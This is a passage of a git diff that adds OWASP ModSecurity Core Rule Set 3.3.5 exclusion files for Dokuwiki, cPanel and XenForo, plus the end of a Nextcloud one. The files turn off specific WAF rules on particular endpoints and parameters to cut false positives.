ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + +# Change Password and Setting up a new user/password + +SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ + "id:9003500,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ + ver:'OWASP_CRS/3.3.5'" + + +SecMarker "END-NEXTCLOUD-ADMIN" + +SecMarker "END-NEXTCLOUD" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf new file mode 100644 index 000000000..048d421f3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf @@ -0,0 +1,273 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default Dokuwiki install. +# The exclusions are only active if crs_exclusions_dokuwiki=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. +# +# Note, if you want to relax the upload restrictions, +# see rule 900240. For Dokuwiki you can limit the exception +# to the ajax.php file: +# +# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" ... +# + + +SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ + "id:9004000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DOKUWIKI" + +SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ + "id:9004001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DOKUWIKI" + + +# +# -=[ Dokuwiki Front-End ]=- +# +# Note on files specified: +# /doku.php: shows pages, saves, edits, admin +# /lib/exe/ajax.php: autosave, uploads +# +# Allow pages to be edited, and ajax to save drafts. +# +# ARGS 'wikitext', 'suffix', and 'prefix' must allow the same things, +# as the page (in part or whole) is passed via 'suffix/prefix' at times. +# attack-protocol (921110-921160/920230): Allows odd characters on the page. +# CRS: (still need attack-protocol specified.) +# attack-injection-php (930000-933999): Allows code on page. +# attack-sqli (940000-942999): Allows SQL expressions on page. +# +# Others: +# 930100-930110;REQUEST_BODY: if there's a /../ in the text. +# +# ARGS:summary (the text in the 'summary' box on page edits.): +# Allowing 930120-930130 lets user save summaries with +# system file names. This should not be needed in normal +# use. But leaving a note here of how to allow in rule below: +# ctl:ruleRemoveTargetById=930120;ARGS:summary +# ctl:ruleRemoveTargetById=930130;ARGS:summary +# +# Also, can't specify: +# SecRule ARGS:do "@streq edit" \ +# SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php"\ +# because at times the do=edit can get dropped, so if we use +# above the edit will get blocked when the page is saved. + +# Hint: those using .htaccess rewrites can remove/replace +# this first 'SecRule...' line with 'SecAction \' (unsupported). + +SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ + "id:9004100,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_METHOD "@streq POST" \ + "t:none,\ + chain" + SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:wikitext,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:wikitext,\ + ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:suffix,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:suffix,\ + ctl:ruleRemoveTargetByTag=attack-protocol;ARGS:prefix,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:prefix,\ + ctl:ruleRemoveTargetById=930100-930110;REQUEST_BODY" + + +# Allow it to upload files. But check for cookies just to make sure. + +SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ + "id:9004110,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_METHOD "@streq POST" \ + "t:none,\ + chain" + SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ + "t:none,\ + setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type}|application/octet-stream'" + + +# Show the index, even if things like "postgresql" or other things show up. + +SecRule REQUEST_FILENAME "@endsWith /doku.php" \ + "id:9004130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:do "@streq index" \ + "t:none,\ + chain" + SecRule &ARGS:do "@eq 1" \ + "t:none,\ + ctl:ruleRemoveById=951240,\ + ctl:ruleRemoveById=953110" + + +# +# [ Login form ] +# + +# Turn off checks for password. + +SecRule REQUEST_FILENAME "@endsWith /doku.php" \ + "id:9004200,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:do "@streq login" \ + "t:none,\ + chain" + SecRule &ARGS:do "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:p" + + +# +# [ Admin Area ] +# +# Skip this section for performance unless do=admin is in request + +SecRule ARGS:do "!@streq admin" \ + "id:9004300,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DOKUWIKI-ADMIN" + +SecRule ARGS:do "!@streq admin" \ + "id:9004310,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-DOKUWIKI-ADMIN" + + +# [ Reset password ] +# +# Turn off checks for pass1, pass1-text, pass2 + +SecRule REQUEST_FILENAME "@endsWith /doku.php" \ + "id:9004320,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:do "@streq login" \ + "t:none,\ + chain" + SecRule &ARGS:do "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + + +# [ Save config ] +# +# Allow the config to be saved: +# 942200: If the user adds "..." to tagline: ARGS:config[tagline] +# 942430: if ARGS:config[hidepages] has pages looking like sql statements +# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] + +SecRule REQUEST_FILENAME "@endsWith /doku.php" \ + "id:9004370,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:page "@streq config" \ + "t:none,\ + chain" + SecRule &ARGS:page "@eq 1" \ + "t:none,\ + chain" + SecRule REQUEST_METHOD "@streq POST" \ + "t:none,\ + chain" + SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ + "t:none,\ + ctl:ruleRemoveTargetById=920230;ARGS:config[dformat],\ + ctl:ruleRemoveTargetById=942200;ARGS:config[tagline],\ + ctl:ruleRemoveTargetById=942430;ARGS:config[hidepages],\ + ctl:ruleRemoveTargetById=942430-942440;ARGS:config[signature]" + + +# When the config loads after a save, it gets blocked because +# it has 'readdir' and lines that look like sql +# 942430,942440: "--- //[[@MAIL@|@NAME@]] @DATE@//"]" in ARGS:config[signature] +# 951240,953110: When the page reloads, it triggers +# postgres and php code disclosure rules. + +SecRule REQUEST_FILENAME "@endsWith /doku.php" \ + "id:9004380,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + noauditlog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:page "@streq config" \ + "t:none,\ + chain" + SecRule &ARGS:page "@eq 1" \ + "t:none,\ + chain" + SecRule REQUEST_COOKIES:/S?DW[a-f0-9]+/ "@rx ^[%a-zA-Z0-9_-]+" \ + "t:none,\ + ctl:ruleRemoveById=951240,\ + ctl:ruleRemoveById=953110" + + +# End [ Admin Area ] + +SecMarker "END-DOKUWIKI-ADMIN" + +SecMarker "END-DOKUWIKI" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf new file mode 100644 index 000000000..5bc280327 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf @@ -0,0 +1,64 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default cPanel environment. +# The exclusions are only active if crs_exclusions_cpanel=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. + + +SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ + "id:9005000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-CPANEL" + +SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ + "id:9005001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-CPANEL" + + +# +# [ cPanel whm-server-status ] +# +# Cpanel's WHM auto generates requests to /whm-server-status from +# 127.0.0.1 (triggers rule 920280, non-blocking, log only) Once every 5 minutes. +# These false positives have a low impact (logged, non-blocking) to a large number of users (all cPanel admins). +# + +# +# Rule to allow cPanel whm-server-status requests from localhost without log entry. +# +SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$" \ + "id:9005100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-apache',\ + tag:'attack-generic',\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ + "t:none,\ + ctl:ruleRemoveById=920280,\ + ctl:ruleRemoveById=920350" + + +SecMarker "END-CPANEL" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf new file mode 100644 index 000000000..969caaaf3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf @@ -0,0 +1,587 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default XenForo install. +# The exclusions are only active if crs_exclusions_xenforo=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. + +SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ + "id:9006000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO" + +SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ + "id:9006001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO" + + +# +# -=[ XenForo Front-End ]=- +# + +# Proxy for images and remote content embedded in forum posts +# GET /xf/proxy.php?image=https://example.com/some.jpg&hash=foo +# GET /xf/proxy.php?link=https://example.com&hash=foo +# POST /xf/proxy.php, body: referrer=... +SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ + "id:9006100,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:image,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ + ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ + ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ + ver:'OWASP_CRS/3.3.5'" + +# Store drafts for private message, forum post, thread reply +# POST /xf/conversations/draft +# POST /xf/conversations/convo-title.12345/draft +# POST /xf/forums/forum-title.12345/draft +# POST /xf/threads/thread-title-%E2%98%85.12345/draft +# +# attachment_hash_combined example: +# {"type":"post","context":{"post_id":12345},"hash":"0123456789abcdef..."} +SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)/.*)/draft$" \ + "id:9006110,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:href,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Send PM, edit post, create thread, reply to thread +# POST /xf/conversations/add +# POST /xf/conversations/add-preview +# POST /xf/conversations/messages/1463947/edit +# POST /xf/posts/12345/edit +# POST /xf/posts/12345/preview +# POST /xf/conversations/convo-title.12345/add-reply +# POST /xf/threads/thread-title.12345/add-reply +# POST /xf/threads/thread-title.12345/reply-preview +# POST /xf/forums/forum-title.12345/post-thread +# POST /xf/forums/blogs/post-thread +# POST /xf/forums/forum-title.12345/thread-preview +SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/messages/\d+/edit|posts/\d+/(?:edit|preview)|(?:conversations|threads)/.*\.\d+/(?:add-reply|reply-preview)|forums/.*/(?:post-thread|thread-preview))$" \ + "id:9006120,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message_html,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Quote +# POST /xf/posts/12345/quote +SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \ + "id:9006130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\ + ver:'OWASP_CRS/3.3.5'" + +# Multi quote +# POST /xf/conversations/convo-title.12345/multi-quote +# POST /xf/threads/thread-title.12345/multi-quote +# quotes={"12345":["quote-html"]} +SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \ + "id:9006140,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quotes,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[0][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[1][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[2][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[3][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[4][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[5][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[6][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\ + ver:'OWASP_CRS/3.3.5'" + +# Delete thread +# POST /xf/threads/thread-title.12345/delete +SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \ + "id:9006150,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\ + ver:'OWASP_CRS/3.3.5'" + +# Feature thread +# POST /xf/threads/thread-title.12345/feature-edit +SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/feature-edit$" \ + "id:9006155,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feature[feature_excerpt]" + +# Inline moderate thread +# POST /xf/inline-mod/ +SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \ + "id:9006160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ver:'OWASP_CRS/3.3.5'" + +# Warn member +# POST /xf/members/name.12345/warn +# POST /xf/posts/12345/warn +SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \ + "id:9006170,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\ + ver:'OWASP_CRS/3.3.5'" + +# Editor +SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \ + "id:9006200,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:bb_code,\ + ctl:ruleRemoveTargetById=942200;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\ + ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\ + ver:'OWASP_CRS/3.3.5'" + +# Editor +SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \ + "id:9006210,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\ + ver:'OWASP_CRS/3.3.5'" + +# Post attachment +# POST /xf/account/avatar +# POST /xf/attachments/upload?type=post&context[thread_id]=12345&hash=foo +SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \ + "id:9006220,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=200003,\ + ctl:ruleRemoveTargetById=942220;ARGS:flowChunkSize,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\ + ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\ + ver:'OWASP_CRS/3.3.5'" + +# Media +# POST /xf/index.php?editor/media +SecRule REQUEST_URI "@endsWith /index.php?editor/media" \ + "id:9006230,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetById=942130;ARGS:url,\ + ver:'OWASP_CRS/3.3.5'" + +# Emoji +# GET /xf/index.php?misc/find-emoji&q=(%0A%0A +SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \ + "id:9006240,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=921151;ARGS:q,\ + ver:'OWASP_CRS/3.3.5'" + +# Login +# POST /xf/login/login +SecRule REQUEST_FILENAME "@endsWith /login/login" \ + "id:9006300,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ + ver:'OWASP_CRS/3.3.5'" + +# Register account +# POST /xf/register/register +# The password is passed in a variable-name form parameter. We don't +# want to exclude all parameters completely as this would cause an +# unacceptable bypass. So, we exclude only commonly hit rules. +SecRule REQUEST_FILENAME "@endsWith /register/register" \ + "id:9006310,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=942130;ARGS,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\ + ver:'OWASP_CRS/3.3.5'" + +# Confirm account +# GET /xf/account-confirmation/name.12345/email?c=foo +SecRule REQUEST_FILENAME "@rx /account-confirmation/.*\.\d+/email$" \ + "id:9006315,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c" + +# Edit account +# POST /xf/account/account-details +SecRule REQUEST_FILENAME "@endsWith /account/account-details" \ + "id:9006320,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\ + ver:'OWASP_CRS/3.3.5'" + +# Lost password +# POST /xf/lost-password/user-name.12345/confirm?c=foo +SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \ + "id:9006330,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\ + ver:'OWASP_CRS/3.3.5'" + +# Set forum signature +# POST /xf/account/signature +SecRule REQUEST_FILENAME "@endsWith /account/signature" \ + "id:9006340,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\ + ver:'OWASP_CRS/3.3.5'" + +# Search +# POST /xf/search/search +SecRule REQUEST_FILENAME "@endsWith /search/search" \ + "id:9006400,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:keywords,\ + ctl:ruleRemoveTargetById=942200;ARGS:constraints,\ + ctl:ruleRemoveTargetById=942260;ARGS:constraints,\ + ctl:ruleRemoveTargetById=942340;ARGS:constraints,\ + ctl:ruleRemoveTargetById=942370;ARGS:constraints,\ + ver:'OWASP_CRS/3.3.5'" + +# Search within thread +# GET /xf/threads/foo.12345/page12?highlight=foo +SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \ + "id:9006410,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\ + ver:'OWASP_CRS/3.3.5'" + +# Search within search result +# GET /xf/search/12345/?q=foo +SecRule REQUEST_FILENAME "@rx /search/\d+/$" \ + "id:9006420,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\ + ver:'OWASP_CRS/3.3.5'" + +# Contact form +# POST /xf/misc/contact +SecRule REQUEST_FILENAME "@endsWith /misc/contact" \ + "id:9006500,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\ + ver:'OWASP_CRS/3.3.5'" + +# Report post +# POST /xf/posts/12345/report +SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \ + "id:9006510,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\ + ver:'OWASP_CRS/3.3.5'" + +# Alternate thread view route +# /xf/index.php?threads/title-having-some-sql.12345/ +# +# Especially threads with the HAVING sql keyword are FP prone. +# This rule has some chains to narrow down the exclusion, +# making it harder for an attacker to abuse the ARGS_NAMES +# exclusion on other endpoints. +SecRule REQUEST_FILENAME "@endsWith /index.php" \ + "id:9006600,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_METHOD "@streq GET" \ + "t:none,\ + chain" + SecRule &ARGS "@eq 1" \ + "t:none,\ + chain" + SecRule REQUEST_URI "@rx /index\.php\?threads/.*\.\d+/$" \ + "t:none,\ + ctl:ruleRemoveTargetById=942100;ARGS_NAMES,\ + ctl:ruleRemoveTargetById=942230;ARGS_NAMES" + +# Browser fingerprint (DBTech security extension) +# May Contain various javascript/XSS false positives +SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \ + "id:9006700,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\ + ver:'OWASP_CRS/3.3.5'" + +# Get location info +SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \ + "id:9006710,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\ + ver:'OWASP_CRS/3.3.5'" + +# +# -=[ XenForo Global Exclusions ]=- +# + +# _xfRedirect, _xfRequestUri can appear on various endpoints. +# Cookies can appear on all endpoints. + +SecAction \ + "id:9006800,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=931120;ARGS:_xfRedirect,\ + ctl:ruleRemoveTargetById=941150;ARGS:_xfRedirect,\ + ctl:ruleRemoveTargetById=942230;ARGS:_xfRedirect,\ + ctl:ruleRemoveTargetById=942260;ARGS:_xfRedirect,\ + ctl:ruleRemoveTargetById=931120;ARGS:_xfRequestUri,\ + ctl:ruleRemoveTargetById=941150;ARGS:_xfRequestUri,\ + ctl:ruleRemoveTargetById=942130;ARGS:_xfRequestUri,\ + ctl:ruleRemoveTargetById=942230;ARGS:_xfRequestUri,\ + ctl:ruleRemoveTargetById=942260;ARGS:_xfRequestUri,\ + ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_csrf,\ + ctl:ruleRemoveTargetById=942210;REQUEST_COOKIES:xf_csrf,\ + ctl:ruleRemoveTargetById=942440;REQUEST_COOKIES:xf_csrf,\ + ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_emoji_usage,\ + ctl:ruleRemoveTargetById=942150;REQUEST_COOKIES:xf_emoji_usage,\ + ctl:ruleRemoveTargetById=942410;REQUEST_COOKIES:xf_emoji_usage,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\ + ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\ + ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\ + ver:'OWASP_CRS/3.3.5'" + +# +# -=[ XenForo Administration Back-End ]=- +# + +# Skip this section for performance unless requested file is admin.php + +SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ + "id:9006900,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO-ADMIN" + +SecRule REQUEST_FILENAME "!@endsWith /admin.php" \ + "id:9006901,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-XENFORO-ADMIN" + +# Admin edit user +# POST /xf/admin.php?users/the-user-name.12345/edit +SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \ + "id:9006910,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ + ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\ + ver:'OWASP_CRS/3.3.5'" + +# Admin save user +# POST /xf/admin.php?users/the-user-name.12345/save +# Runs in phase 1 to be able to remove rule 200003. +SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \ + "id:9006920,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=200003,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[occupation],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[personal_quote],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\ + 